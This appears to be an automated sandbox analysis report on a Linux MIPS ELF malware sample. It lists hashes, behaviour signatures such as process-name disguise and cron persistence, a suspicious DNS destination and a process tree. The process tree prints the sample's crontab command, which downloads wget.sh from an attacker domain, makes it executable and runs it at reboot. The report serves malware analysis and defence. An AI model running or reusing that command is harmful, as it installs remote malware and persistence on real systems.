Analysis
-
max time kernel
151s -
max time network
142s -
platform
debian-12_mipsel -
resource
debian12-mipsel-20240221-en -
resource tags
arch:mipselimage:debian12-mipsel-20240221-enkernel:6.1.0-17-4kc-maltalocale:en-usos:debian-12-mipselsystem -
submitted
27-10-2024 02:54
Static task
static1
Behavioral task
behavioral1
Sample
cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
Resource
debian12-mipsel-20240221-en
General
-
Target
cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
-
Size
87KB
-
MD5
353a49ca2c9b8b35fb036b2de1587fc4
-
SHA1
e5cd1ab8dc2c224a5b82113a41ec46479895ae27
-
SHA256
cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
-
SHA512
8a47f0d0a8899d153cf80d5579d7ca8f81b9efe9daf93a2f60f72d5ad1ed77a360f3ff6f93cad6b016a52ec6a6f76b94bf2d427f6d9eda0bc5f7cf609e6fd484
-
SSDEEP
1536:GJTjy914iDyIV6n30taWKqlpbfc/SLuZ++5+BJoK+mcS/:GJTj614NNczc/0ublmx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elfpid process 744 cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 152.53.15.127 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.wB9D8g crontab -
Changes its process name 1 IoCs
Processes:
cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elfdescription ioc pid process Changes the process name, possibly in an attempt to hide itself [watchdog/0] 744 cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf -
Processes:
cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elfdescription ioc process File opened for reading /proc/769/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/770/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/1/cmdline cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/747/cmdline cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/762/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/764/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/768/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/715/cmdline cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/771/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/773/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/758/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/759/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/713/cmdline cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/766/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/760/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/772/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/761/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/22/cmdline cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf File opened for reading /proc/763/status cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
Processes
-
/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf1⤵
- Renames itself
- Changes its process name
- Reads runtime system information
PID:744 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:746 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:750 -
/usr/bin/crontabcrontab -l3⤵PID:751
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
306B
MD5bfd2089040b748f688b70470021d4d43
SHA1c2a6fac8ce436a014bb4149d14d7853259b9323c
SHA256cfb81f43363ede429f69a6c15d63fbfdb87246bd92fc6a55a189c1001bfb4b3b
SHA5124aee0c647992fff8bc38624556617e8b78523f37f9169ecc32dbc303821881cf90f1fdccc9add3cfc06b6089a8f8e17878173f132a16db77cb152869c2ea487e